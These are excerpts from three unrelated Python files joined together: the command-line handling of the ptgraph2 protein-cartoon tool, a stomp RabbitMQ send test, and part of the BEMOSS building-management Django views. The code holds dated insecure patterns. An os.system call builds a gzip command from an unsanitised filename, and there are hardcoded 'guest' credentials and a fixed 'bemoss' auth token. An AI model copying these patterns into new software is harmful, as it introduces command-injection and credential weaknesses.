sys.stderr.write(" -s write PyMOL .pml command file to show SSE definitions\n")
sys.stderr.write(" -v print verbose debugging messages to stderr\n")
sys.stderr.write(" -i use distance matrix information instead of\n"
" heuristic/aesthetic algorithm for helix placement\n")
sys.stderr.write(" -j only valid when not using -i. Don't align helices\n"
" on strand axes if they would push sheets apart\n")
sys.stderr.write(" -k <color> cluster helices, shading them all <color>\n")
sys.stderr.write(" -e <color_list>|auto shade nearby helix clusters the same color\n")
sys.stderr.write(" -x draw connector arrowheads\n")
sys.stderr.write(" -f <color_list>|auto shade each sheet a different color\n")
sys.stderr.write(" -g <separation> set the strand and minimum object separation\n")
sys.stderr.write(" -l connector color scheme: 'all[:<color>]' (default), "
"'chain[:<color_list>]', "
"'domain[:<intra_color>,<inter_color>']"
", crossing:<color_list>\n")
sys.stderr.write(" -o SSE color scheme: 'none' (default), "
"'simple:sheet=<sheet_colors>.helixcluster=<helixcluster_colors>.alpha=<helix_alpha_colors>.pi=<helix_pi_colors>.310=<helix_310_colors>.terminus=<terminus_colors>', "
"'gradient', 'sheet', 'fold'\n")
sys.stderr.write(" -u multidomain cartoon: place all domains in the one\n"
" SVG file instead of one per file\n")
sys.stderr.write(" -w interdomain connectors: when using multidomain\n"
" cartoons, draw connectors between domains\n"
" (only in conjunction with -u)\n")
sys.stderr.write(" -q label start and end of helices and strands with\n"
" first and last PDB residue id in that SSE.\n")
sys.stderr.write(" -y use uniform scaling to try to avoid overlaps.\n"
" Ugly and often does not work anyway, use only as\n"
" last resort\n")
sys.stderr.write(" -z print version information and exit\n")
sys.exit(1)
#-----------------------------------------------------------------------------
#
# Main
#
#-----------------------------------------------------------------------------
def main():
"""
main for ptgraph2.py
Usage: ptgraph2 [-35acdnhrimsvxguwyz] [-p domainprog] [-t structprog]
[-o ssecolorscheme ] [-l connectorcolorscheme]
[-b sselabelsceheme ] [-f <sheet_shade_color_list>]
[ -k <color> ] [ -g <separation> ]
[-e <helixcluster_shade_color_list>]
PDBfile
Output is a Dunnart file in SVG format named
pdb-X.svg where pdb is the pdb identifier
from the PDB file supplied and X is the domain identifier.
-3 specifies to include 3_10 helices in the diagram. Default is only
alpha helices.
-5 specifies to include pi helices in the diagram. Defaul is only
alpha helices.
-a specifies to use Dunnart automatic graph layout (not compatible with
-d or -n or -h) (Default is to use Dunnart but not auto graph layout).
-c use the HELIX and SHEET cards from the PDB file to define secondary
structure. DSSP or STRIDE is still needed to find hydrogen bonds,
and will also be used if there are no HELIX or SHEET cards.
-d specifies to use GraphViz dot instead of outputing SVG for Dunnart.
This outputs a PostScript file.
-n specifies to use GraphViz neato instead of outputting SVG for Dunnart.
This outputs a PostScript file.
-h specifies to use stride hydrogen bonds (from stride -h, unmodified
stride can do this) instead of the default of using bridge partners
as determined by stride (-\$ -i, requires modified stride included
with this program) and draw an H-bond graph instead of default
topological drawing.
-p specifies the domain parsing program to use. Currently supported is
"none" (no domain decomposition) or "ddomain" (default) or
"cath:cdf_file" (CATH CDF file where cdf_file is the filename).
-r disables the use of TableauCreator; relative angles of helices/strands
are computed internally.
-b specifies the SSE labelling scheme to use.
'none' SSEs have no labels
'sequential' SSEs are labelled 1,2,3, etc.
'separate' (default) Strands are labelled 1,2,3,...
and helices are labelled A,B,C,...
Only for Dunnart (not compatible with -d or -n or -h)
-t specifies the secondary structure assignment program to use.
Currently suppoed is 'dssp' and 'stride'. Default 'dssp'.
-i specifies to use distance matrix information to place helices
near elements they are (3d) spatially close to, rather than
using a heurstic to place them in easy-to-read alignments on
nearby (in sequence) strands.
-j only valid when not using -i. Don't align helices on strand axes
if they would exceed a length threshold 'pushing apart' sheets
that have been placed as neighbours.
-k <color>
only valid when not using -i. Draw sequential helices as a cluster
using tableau and distance matrix rather than aligning all on strand
axis. Shade them all <color>.
-e <color_list> only valid when using -k.
Color helix clusters the same shade when
they are nearby in 3d space (although not nearby in the diagram).
<color_list> is as specified for -o (below). If <color_list>
is specified as 'auto'
then colors are automatically selected by color gradient.
The default is to shade them all the same color specified by -k.
-m writes MATLAB M-files to plot strand carbon-alpha backbone traces
and fitted axes.
-s writes a PyMOL .pml command file to load the structure into PyMOL
and show cartoon with SSEs defined according to the method
used for our cartoon (from DSSP or STRIDE or PDB) rather than
PyMOL's internal definition.
-v specifies verbose mode: debugging output is written to stderr.
-x specifies to draw connector arrowheads indicating sequence direction
from N- to C-terminus. Only used with Dunnart SVG.
-f <color_list> specifies to shade each sheet a different color.
<color_list> is as specified for -o (below). If <color_list>
is specified as 'auto' then
colors are automatically selected by color gradient.
The default is to shade them all the same (default) color.
-g <separation> set the strand and minimum object separation value
(defaults to 55).
-l specifies the connector color scheme to use.
'all[:<color>]' (default) colors all connectors same color (default black)
'chain[:<color_list>]' colors connectors in each chain a different color
in order of the <color_list> or autmoatically chosen
if no <color_list>
'domain[:<intra_color>,<inter_color>]' colors intra-domain connectors
one color (default black) and inter-domain
connectors another (default violet).
'crossing[:<color_list>]' colors connectors that cross or closely
follow each other
different colors in order to make them easier
to distinguish. colors chosen from
<color_list> in order, or automatically
chosen if not specified.
color lists are as specified for -o (below).
-o specifies the SSE color scheme to use. 'none' is to color shapes the
default color (default).
'simple:sheet=<sheet_colors>.helixcluster=<helixcluster_color>.alpha=<helix_alpha_colors>.pi=<helix_pi_colors>.310=<helix_310_colors>.terminus=<terminus_colors>
colors strands in sheets
the sheet_color, helices in helix clusters
(if any) the helixcluster_color, helices the helix_color.
the color lists are comma-delimited lists of recognized color names
or RGB colors in hex (e.g. sheet=red,purple,#ddf02d).
If only one color is in the list then all elements of that type are
colored that color, otherwise the colors are used in turn.
If they run out (more elements than colors in list, the list is
treated as circular, ie colors reused from the start of list again).
Not all types may be specified, those not specified will be colored
default color. They need not be specified in order (keyword=value style
parameters; delimited by . (no whitespace, and no ; as it is a shell
character making it necessary to quote it).
'gradient' colors strands and helices along a color gradient from
N to C terminus.
'sheet' colors the strands in each sheet a different color, leaving
helices the default color.
'fold' for each sheet colors strands that are connected only by
turns (i.e. are consecutive in sequence) one color (maybe more
than one set of such conseuctive strands in sheet, a different
color for each such set), and other strands (i.e. not in a sequence)
another color(s).
-u multidomain cartoon: place all domains in the one SVG file instead of
one domain per file.
-w interdomain connectors: when using multidomain cartoons, draw connectors
between domains instead of using pseudo-terminus nodes as normally
used.
-q residue numbers: put start and end residue numbers on start and end
of helices and strands as labels
-y use uniform scaling to try to avoid overlaps before Dunnart processing
in order to try to reduce Dunnart crashes. Ugly, use as last resort.
-z print version information and exit
"""
global verbose
try:
opts, args = getopt.getopt(sys.argv[1:], "35acde:f:g:ijk:l:hmno:p:qrb:st:uwv?xyz")
except getopt.GetoptError:
usage(sys.argv[0])
# allowed args for -p option (regexp)
valid_domain_programs = [r"none", r"ddomain", r"cath:.*"]
valid_domain_programs_re = [ re.compile(re_str) for re_str in
valid_domain_programs ]
valid_secstruct_programs = ["dssp", "stride"]
valid_colorstring = r'((#[0-9A-Fa-f]{6})|([a-zA-Z0-9]+))'
valid_colorlist = valid_colorstring + '(,' + valid_colorstring + ')*'
valid_type = r"((sheet)|(helixcluster)|(alpha)|(pi)|(310)|(terminus))"
valid_typevalue = r"(" + valid_type + r"=" + valid_colorlist+ r")"
valid_color_options = [r"none$",
r"simple:"+ valid_typevalue +
r"(." + valid_typevalue + "){0,5}$",
r"gradient$",
r"sheet$",
r"fold$"]
valid_color_options_re = [ re.compile(re_str) for re_str in
valid_color_options ]
valid_connector_color_options = [r"all(:" + valid_colorstring + r")?$",
r"chain(:" + valid_colorlist + r")?$",
r"domain:" + valid_colorstring +
r',' + valid_colorstring + '$',
r"crossing(:" + valid_colorlist + r")?$"]
valid_connector_color_options_re = [ re.compile(re_str) for re_str in
valid_connector_color_options ]
valid_sheet_shading_colors = [ r'auto$', valid_colorlist + r'$' ]
valid_sheet_shading_colors_re = [ re.compile(re_str) for re_str in
valid_sheet_shading_colors ]
valid_helixcluster_shading_colors = [ r'auto$', valid_colorlist + r'$' ]
valid_helixcluster_shading_colors_re = [ re.compile(re_str) for re_str in
valid_helixcluster_shading_colors ]
valid_sse_label_options = ["none", "sequential", "separate"]
valid_k_option = valid_colorstring + '$'
valid_k_option_re = re.compile(valid_k_option)
use_dot = False
use_neato = False
use_hbonds = False
verbose = False # global (python globals are only 'global' to module though)
use_dunnart_auto = False
sse_label_scheme = 'separate'
use_connector_arrowheads = False
domain_program = "ddomain"
secstruct_program = "dssp"
heuristic_helix_placement = True
use_tableaucreator = True
include_310_helices = False
include_pi_helices = False
write_mfiles = False
write_pmlfile = False
use_pdb_secstruct = False
sheet_shading_colors = None
color_scheme = 'none'
enable_sheet_gap_rule = False
use_helix_clustering = False
helix_cluster_shading_color = None
connector_color_scheme = 'all'
helix_proximity_shading_colors = None
multidomain_cartoon = False
interdomain_connectors = False
use_scaling = False
label_residue_numbers = False
for opt,arg in opts:
if opt == "-3": # include 3_10 helices
include_310_helices = True
elif opt == "-5": # include pi helices
include_pi_helices = True
elif opt == "-a": # for Dunnart, use auto graph layout
use_dunnart_auto = True
elif opt == "-c": # use HELIX and SHEET cards in PDB file
use_pdb_secstruct = True
elif opt == "-d": # use dot
use_dot = True
elif opt == "-f": # shade each sheet a different color
for valid_sheet_shading_color_re in valid_sheet_shading_colors_re:
if valid_sheet_shading_color_re.match(arg):
sheet_shading_colors = arg
break
if sheet_shading_colors == None:
sys.stderr.write("valid values for -f are: " +
str(valid_sheet_shading_colors) +'\n')
usage(sys.argv[0])
# verify that color names are known if specified
if sheet_shading_colors != 'auto':
try:
get_color_list(sheet_shading_colors)
except KeyError:
sys.stderr.write("Unknown color name in -f option\n")
usage(sys.argv[0])
elif opt == "-g": # set strand and minimum separation value
set_strand_gap(int(arg))
elif opt == "-h": # use hbonds not bridge partners
use_hbonds = True
elif opt == "-l": # connector color scheme
connector_color_scheme = None
for valid_conncolorscheme_re in valid_connector_color_options_re:
if valid_conncolorscheme_re.match(arg):
connector_color_scheme = arg
break
if connector_color_scheme == None:
sys.stderr.write("valid values for -l are; " +
str(valid_connector_color_options) + "\n")
usage(sys.argv[0])
# verify that color names are known if specified
if ':' in connector_color_scheme:
try:
get_connector_colors(connector_color_scheme)
except KeyError:
sys.stderr.write("Unknown color name in -l option\n")
usage(sys.argv[0])
elif opt == "-m": # write MATLAB m-files
write_mfiles = True
elif opt == "-n": # use neato
use_neato = True
elif opt == "-o": # color scheme
color_scheme = None
for valid_coloropt_re in valid_color_options_re:
if valid_coloropt_re.match(arg):
color_scheme = arg
break
if color_scheme == None:
sys.stderr.write("valid values for -o are: " +
str(valid_color_options) + "\n")
usage(sys.argv[0])
# verify that color names are known if specfied
if color_scheme[:6] == "simple":
try:
get_simple_colors(color_scheme)
except KeyError:
sys.stderr.write("Unknown color name in -o simple option\n")
usage(sys.argv[0])
except ValueError:
sys.stderr.write("Duplicate type name in -o simple option\n")
usage(sys.argv[0])
elif opt == "-p": # domain parsing program
domain_program = None
for valid_domarg_re in valid_domain_programs_re:
if valid_domarg_re.match(arg):
domain_program = arg
break
if domain_program == None:
sys.stderr.write("valid values for -p are: " +
str(valid_domain_programs) + "\n")
usage(sys.argv[0])
elif opt == "-r": # disable TableauCreator, use internal methods
use_tableaucreator = False
elif opt == "-b":
if arg not in valid_sse_label_options:
sys.stderr.write("valid options for -b are " +
str(valid_sse_label_options))
usage(sys.argv[0])
sse_label_scheme = arg
elif opt == "-s": # write PyMOL .pml file
write_pmlfile = True
elif opt == "-t":
if arg not in valid_secstruct_programs:
sys.stderr.write("valid values for -t are: " +
str(valid_secstruct_programs) + "\n")
usage(sys.argv[0])
secstruct_program = arg
elif opt == "-i": # use distnace matrix instead of heuristic (old)
# helix placement algorithm
heuristic_helix_placement = False
elif opt == "-j": # for heuristic helix placement, not between sheets
enable_sheet_gap_rule = True
elif opt == "-k": # for heuristic helix placement, cluster helices
use_helix_clustering = True
if not valid_k_option_re.match(arg):
sys.stderr.write("valid options for -k are: " +
valid_k_option + '\n')
usage(sys.argv[0])
# verify that color name is known if not #RGB
try:
get_color_list(arg)
except KeyError:
sys.stderr.write("Unknown color name in -k option\n")
usage(sys.argv[0])
helix_cluster_shading_color = arg
elif opt == "-e": # color nearby helix clusters with same cluster shade
for valid_helixcluster_shading_color_re in \
valid_helixcluster_shading_colors_re:
if valid_helixcluster_shading_color_re.match(arg):
helix_proximity_shading_colors = arg
break
if helix_proximity_shading_colors == None:
sys.stderr.write("valid values for -e are: " +
str(valid_helixcluster_shading_colors) +'\n')
usage(sys.argv[0])
# verify that color names are known if specified
if helix_proximity_shading_colors != 'auto':
try:
get_color_list(helix_proximity_shading_colors)
except KeyError:
sys.stderr.write("Unknown color name in -e option\n")
usage(sys.argv[0])
elif opt == "-u": # place all domains in one cartoon SVG file
multidomain_cartoon = True
elif opt == "-w": # connectors between domains on multidomain cartoon
interdomain_connectors = True
elif opt == "-v": # verbose
verbose = True # this module only
ptnode_set_verbose(True) # ptnode module
ptsecstruct.ptsecstruct_set_verbose(True) # ptsecstruct module
ptdomain_set_verbose(True)
ptrelpos_set_verbose(True)
pttableau.pttableau_set_verbose(True)
elif opt == "-q": # label residue numbers on tail and head of shapes
label_residue_numbers = True
elif opt == "-x":
use_connector_arrowheads = True
elif opt == "-y":
use_scaling = True
elif opt == "-z": # print version to stdout and exit
sys.stdout.write(get_version())
sys.stdout.write('\n')
sys.exit(0)
else:
usage(sys.argv[0])
if use_dot and use_neato:
sys.stderr.write(
'-d (dot) and -n (neato) options are mutually exclusive\n')
usage(sys.argv[0])
if use_hbonds and not (use_dot or use_neato):
sys.stderr.write('-h (hbonds) option requires -d (dot) or -n (neato)\n')
usage(sys.argv[0])
if use_dunnart_auto and (use_dot or use_neato):
sys.stderr.write('-a (Dunnart auto graph layout) cannot be used with ' +
'GraphViz (-d or -n)\n')
usage(sys.argv[0])
if sse_label_scheme == 'sequential' and (use_dot or use_neato):
sys.stderr.write('sequential node numbering cannot be used with ' +
'GraphViz (-d or -n)\n')
usage(sys.argv[0])
if use_connector_arrowheads and (use_dot or use_neato):
sys.stderr.write('-x (connector arrowheads) cannot be used with ' +
'GraphViz (-d or -n)\n')
usage(sys.argv[0])
if enable_sheet_gap_rule and not heuristic_helix_placement:
sys.stderr.write("-j cannot be used with distance matrix placement (-i)\n")
usage(sys.argv[0])
if use_helix_clustering and not heuristic_helix_placement:
sys.stderr.write("-k cannot be used with distance matrix placement (-i)\n")
usage(sys.argv[0])
if helix_proximity_shading_colors and not use_helix_clustering:
sys.stderr.write("-e can only be used with helix clustering (-k)\n")
usage(sys.argv[0])
if interdomain_connectors and not multidomain_cartoon:
sys.stderr.write("-w can only be used with multidomain cartoons (-u)\n")
usage(sys.argv[0])
if (connector_color_scheme[:6] == 'domain' and not interdomain_connectors):
sys.stderr.write("WARNING: 'domain' connector color scheme only makes"
" sense with interdomain connectors (-w)\n")
sys.stderr.write(" Connector color scheme reset to 'none'.\n")
if len(args) != 1:
usage(sys.argv[0])
pdb_filename = args[0]
# check for compressed files. We only support gzip (.gz)
# Note we are not using the zlib or GzipFile python modules
# since we are calling to external programs which require the
# file uncompressed themsevles anyway so we'll just run gzip
# to uncompress the file to a temporary directory.
pdb_file_basename = os.path.basename(pdb_filename)
(name,extension) = os.path.splitext(pdb_file_basename)
if extension == '.gz':
TMPDIR = os.tempnam(None, "ptgz")
os.mkdir(TMPDIR)
tmp_pdbfilename = os.path.join(TMPDIR, name)
os.system("gzip " + pdb_filename + " -d -c > " + tmp_pdbfilename)
our_pdb_filename = tmp_pdbfilename
used_tmp_file = True
else:
our_pdb_filename = pdb_filename
used_tmp_file = False
try:
# make graph(s) from PDB file
make_graphs(our_pdb_filename, domain_program, secstruct_program,
use_dot, use_neato, use_hbonds, use_dunnart_auto,
sse_label_scheme, use_connector_arrowheads,
connector_color_scheme,
heuristic_helix_placement, use_tableaucreator,
include_310_helices, include_pi_helices,
write_mfiles, use_pdb_secstruct, sheet_shading_colors,
color_scheme, enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
helix_proximity_shading_colors,
multidomain_cartoon, interdomain_connectors,
use_scaling, write_pmlfile, pdb_filename,
label_residue_numbers)
finally:
if used_tmp_file:
cleanup_tmpdir(TMPDIR)
if __name__ == "__main__":
# tmpdir() annoyingly gives 'security' warning on stderr, as does
# tmpnam(), unless we add these filterwarnings() calls.
warnings.filterwarnings('ignore', 'tempdir', RuntimeWarning)
warnings.filterwarnings('ignore', 'tempnam', RuntimeWarning)
main()
|
import unittest
import stomp
from stomp.test.testutils import *
class TestRabbitMQSend(unittest.TestCase):
def setUp(self):
pass
def testbasic(self):
conn = stomp.Connection(get_rabbitmq_host(), 'guest', 'guest')
listener = TestListener('123')
conn.set_listener('', listener)
conn.start()
conn.connect(wait=True)
conn.subscribe(destination='/queue/test', id=1, ack='auto')
conn.send(body='this is a test', destination='/queue/test', receipt='123')
listener.wait_on_receipt()
conn.disconnect(receipt=None)
self.assert_(listener.connections == 1, 'should have received 1 connection acknowledgement')
self.assert_(listener.messages == 1, 'should have received 1 message')
self.assert_(listener.errors == 0, 'should not have received any errors')
|
# -*- coding: utf-8 -*-
'''
Copyright (c) 2016, Virginia Tech
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those of the authors and should not be
interpreted as representing official policies, either expressed or implied, of the FreeBSD Project.
This material was prepared as an account of work sponsored by an agency of the United States Government. Neither the
United States Government nor the United States Department of Energy, nor Virginia Tech, nor any of their employees,
nor any jurisdiction or organization that has cooperated in the development of these materials, makes any warranty,
express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness or
any information, apparatus, product, software, or process disclosed, or represents that its use would not infringe
privately owned rights.
Reference herein to any specific commercial product, process, or service by trade name, trademark, manufacturer, or
otherwise does not necessarily constitute or imply its endorsement, recommendation, favoring by the United States
Government or any agency thereof, or Virginia Tech - Advanced Research Institute. The views and opinions of authors
expressed herein do not necessarily state or reflect those of the United States Government or any agency thereof.
VIRGINIA TECH – ADVANCED RESEARCH INSTITUTE
under Contract DE-EE0006352
#__author__ = "BEMOSS Team"
#__credits__ = ""
#__version__ = "2.0"
#__maintainer__ = "BEMOSS Team"
#__email__ = "aribemoss@gmail.com"
#__website__ = "www.bemoss.org"
#__created__ = "2014-09-12 12:04:50"
#__lastUpdated__ = "2016-03-14 11:23:33"
'''
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from django.shortcuts import render_to_response
import json
import ast
import re
import time
import os
from _utils.page_load_utils import get_device_list_side_navigation, get_device_list_dashboard
from apps.alerts.views import get_notifications, general_notifications
from agents.ZMQHelper.zmq_pub import ZMQ_PUB
from _utils import config_helper
from .models import DeviceMetadata, Building_Zone, GlobalSetting
from apps.thermostat.models import Thermostat
from apps.smartplug.models import Plugload
from apps.lighting.models import Lighting
from apps.VAV.models import VAV
from apps.RTU.models import RTU
from apps.admin.models import NetworkStatus
import _utils.defaults as __
kwargs = {'subscribe_address': __.SUB_SOCKET,
'publish_address': __.PUSH_SOCKET}
zmq_pub = ZMQ_PUB(**kwargs)
APPROVED = 'APR'
NON_BEMOSS_DEVICE = 'NBD'
PENDING = 'PND'
APPROVAL_STATUS_CHOICES = {
(APPROVED, 'Approved'),
(PENDING, 'Pending'),
(NON_BEMOSS_DEVICE, 'Non-BEMOSS Device')
}
@login_required(login_url='/login/')
def add_new_zone(request):
if request.POST:
_data = request.raw_post_data
zone_id = ""
a = re.compile("^[A-Za-z0-9_]{6,15}$")
if (a.match(_data)):
p = Building_Zone.objects.get_or_create(zone_nickname=str(_data))
zone_id = Building_Zone.objects.get(zone_nickname=str(_data)).zone_id
global_settings = GlobalSetting(id=zone_id, heat_setpoint=70, cool_setpoint=72, illuminance=67, zone_id=zone_id)
global_settings.save()
message = "success"
if request.is_ajax():
return HttpResponse(str(zone_id), mimetype='text/plain')
else:
message = "invalid"
if request.is_ajax():
return HttpResponse("invalid", mimetype='text/plain')
@login_required(login_url='/login/')
def save_changes_modal(request):
if request.POST:
_data = request.raw_post_data
a = re.compile("^[A-Za-z0-9_]{6,15}$")
_data = ast.literal_eval(_data)
if a.match(_data['nickname']):
device_id = _data['id']
nickname = _data['nickname']
device_type_id = _data['device_type']
if device_type_id == '1TH' :
device = Thermostat.objects.get(thermostat_id=device_id)
device.nickname = nickname
device.save()
elif device_type_id == '1VAV':
device = VAV.objects.get(vav_id=device_id)
device.nickname = nickname
device.save()
elif device_type_id == '1RTU':
device = RTU.objects.get(rtu_id=device_id)
device.nickname = nickname
device.save()
elif device_type_id =='2HUE' or device_type_id =='2WL' or device_type_id == '2WSL':
device = Lighting.objects.get(lighting_id=device_id)
device.nickname = nickname
device.save()
elif device_type_id == '3WSP' or device_type_id == '3WP' or device_type_id == '3WIS':
device = Plugload.objects.get(plugload_id=device_id)
device.nickname = nickname
device.save()
message = {'status':'success',
'device_id':device_id,
'nickname':nickname}
if request.is_ajax():
return HttpResponse(json.dumps(message), mimetype='application/json')
else:
message = "invalid"
if request.is_ajax():
return HttpResponse(json.dumps(message), mimetype='application/json')
@login_required(login_url='/login/')
def save_zone_nickname_changes(request):
context = RequestContext(request)
if request.POST:
_data = request.raw_post_data
a = re.compile("^[A-Za-z0-9_]{6,15}$")
_data = ast.literal_eval(_data)
if a.match(_data['nickname']):
zone_id = _data['id']
nickname = _data['nickname']
zone = Building_Zone.objects.get(zone_id=zone_id)
zone.zone_nickname = nickname # change field
zone.save()
message = {'status':'success',
'zone_id':zone_id,
'nickname':nickname}
if request.is_ajax():
return HttpResponse(json.dumps(message),mimetype='application/json')
else:
message = "invalid"
if request.is_ajax():
return HttpResponse(json.dumps(message),mimetype='application/json')
@login_required(login_url='/login/')
def identify_device(request):
if request.POST:
_data = request.raw_post_data
_data = json.loads(_data)
device_info = [ob.data_as_json() for ob in DeviceMetadata.objects.filter(device_id=_data['id'])]
device_id = device_info[0]['device_id']
if 'zone_id' in _data:
device_zone = _data['zone_id']
device_model = device_info[0]['device_model_id']
device_type_id = device_model.device_model_id
device_type = ''
device_zone = ''
if device_type_id == '1TH' or device_type_id == '1NST' or device_type_id == '1HWT':
device_zone = Thermostat.objects.get(thermostat_id=device_id).zone_id
device_type = 'thermostat'
elif device_type_id == '1RTU':
device_zone = RTU.objects.get(rtu_id=device_id).zone_id
device_type = 'rtu'
elif device_type_id == '1VAV':
device_zone = VAV.objects.get(vav_id=device_id).zone_id
device_type = 'vav'
elif device_type_id =='2HUE' or device_type_id =='2WL' or device_type_id == '2WSL':
device_zone = Lighting.objects.get(lighting_id=device_id).zone_id
device_type = 'lighting'
elif device_type_id == '3WSP' or device_type_id == '3WP' or device_type_id == '3WIS':
device_zone = Plugload.objects.get(plugload_id=device_id).zone_id
device_type = 'plugload'
info_required = "Identify device"
ieb_topic = '/ui/agent/' + device_type + '/identify' + '/bemoss/' + str(device_zone) + '/' + device_id
zmq_pub.requestAgent(ieb_topic, info_required, "text/plain", "UI")
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def identify_status(request):
if request.POST:
_data = request.raw_post_data
device_info = [ob.data_as_json() for ob in DeviceMetadata.objects.filter(device_id=_data)]
device_type_id = device_info[0]['device_model_id']
device_type_id = device_type_id.device_model_id
if device_type_id == '1TH' or device_type_id == '1NST' or device_type_id == '1HWT':
device_type = 'thermostat'
elif device_type_id == '1RTU':
device_type = 'rtu'
elif device_type_id == '1VAV':
device_type = 'vav'
elif device_type_id =='2HUE' or device_type_id =='2WL' or device_type_id == '2WSL':
device_type = 'lighting'
elif device_type_id == '3WSP' or device_type_id == '3WP' or device_type_id == '3WIS':
device_type = 'plugload'
json_result = {'status': 'success'}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
def recursive_get_device_update(update_variable):
wifi_3m50_device_initial_update = config_helper.get_device_update_message(update_variable)
vals = ""
if wifi_3m50_device_initial_update != '{update_number}/{status}':
vals = wifi_3m50_device_initial_update
return vals
else:
time.sleep(5)
recursive_get_device_update(update_variable)
@login_required(login_url='/login/')
def discover_all(request):
if request.POST:
#_data = request.body
discover_all_topic = '/ui/discoveryagent/discover/all'
zmq_pub.requestAgent(discover_all_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
json_result = {'status': 'success'}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def discover_hvac(request):
if request.POST:
#_data = request.body
discover_hvac_topic = '/ui/discoveryagent/discover/hvac/all'
zmq_pub.requestAgent(discover_hvac_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
json_result = {'status': 'success'}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def discover_lighting(request):
if request.POST:
#_data = request.body
discover_lighting_topic = '/ui/discoveryagent/discover/lighting/all'
zmq_pub.requestAgent(discover_lighting_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
json_result = {'status': 'success'}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def discover_plugload(request):
if request.POST:
#_data = request.body
discover_plugload_topic = '/ui/discoveryagent/discover/plugload/all'
zmq_pub.requestAgent(discover_plugload_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
json_result = {'status': 'success'}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def discover_nodes(request):
context = RequestContext(request)
if request.user.get_profile().group.name.lower() == 'admin':
device_list_side_nav = get_device_list_side_navigation()
bemoss_lite = [ob.data_dashboard() for ob in NetworkStatus.objects.filter(node_status='ONLINE')]
active_al = get_notifications()
context.update({'active_al':active_al})
bemoss_not = general_notifications()
context.update({'b_al': bemoss_not})
context.update(device_list_side_nav)
return render_to_response(
'dashboard/node_discovery.html',
{'lites': bemoss_lite}, context)
else:
return HttpResponseRedirect('/home/')
#Version 2.2
#Change: Includes the new field 'approval_status' for manual approval process
@login_required(login_url='/login/')
def discover(request):
print "Discovering devices"
context = RequestContext(request)
username = request.user
device_list_side_nav = get_device_list_side_navigation()
print device_list_side_nav
# Check Philips Hue Username Exists or not:
# Set default value as no:
hue_username_exists = 'no'
DIR = os.path.dirname(__file__)
DIR = DIR.replace('/bemoss_web_ui/apps/dashboard', '/bemoss_os/')
LAUNCHFILES_DIR = os.path.join(DIR, 'Agents/LaunchFiles/')
for idx in os.listdir(LAUNCHFILES_DIR):
if '2HUE' in idx and '.json~' not in idx:
_launch_file = os.path.join(LAUNCHFILES_DIR, idx)
f = open(_launch_file, 'r')
data = json.load(f)
if 'username' in data.keys():
hue_username_exists = 'yes'
if request.user.get_profile().group.name.lower() == 'admin':
# Get data for display on discovery dashboard
data_dashboard = get_device_list_dashboard()
#Update side navigation context
context.update(device_list_side_nav)
#Get alerts and notifications list
active_al = get_notifications()
context.update({'active_al':active_al})
bemoss_not = general_notifications()
context.update({'b_al': bemoss_not})
context.update({'username_exists': hue_username_exists})
return render_to_response(
'dashboard/discovery.html', data_dashboard, context)
else:
return HttpResponseRedirect('/home/')
@login_required(login_url='/login/')
def change_zones_thermostats(request):
#print "Inside change zones for hvac controllers"
if request.POST:
_data = request.body
_data = json.loads(_data)
for thermostat in _data['thermostats']:
if thermostat[1] != "Assign a New Zone":
zone = Building_Zone.objects.get(zone_nickname__iexact=thermostat[1])
th_instance = Thermostat.objects.get(thermostat_id=thermostat[0])
updated_approval_status = thermostat[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(thermostat[0]) + '/' + str(th_instance.zone_id) + '/' + str(zone.zone_id) + '/change'+'/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
old_zone_id = th_instance.zone_id
th_instance.zone = zone # change field
th_instance.nickname = thermostat[2]
# Update device approval status
d_info = DeviceMetadata.objects.get(device_id=thermostat[0])
current_approval_status = d_info.approval_status
print current_approval_status
if updated_approval_status != current_approval_status:
d_info.approval_status = updated_approval_status
d_info.save()
th_instance.save()
for vav in _data['vav']:
if vav[1] != "Assign a New Zone":
zone = Building_Zone.objects.get(zone_nickname__iexact=vav[1])
vav_instance = VAV.objects.get(vav_id=vav[0])
updated_approval_status = vav[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
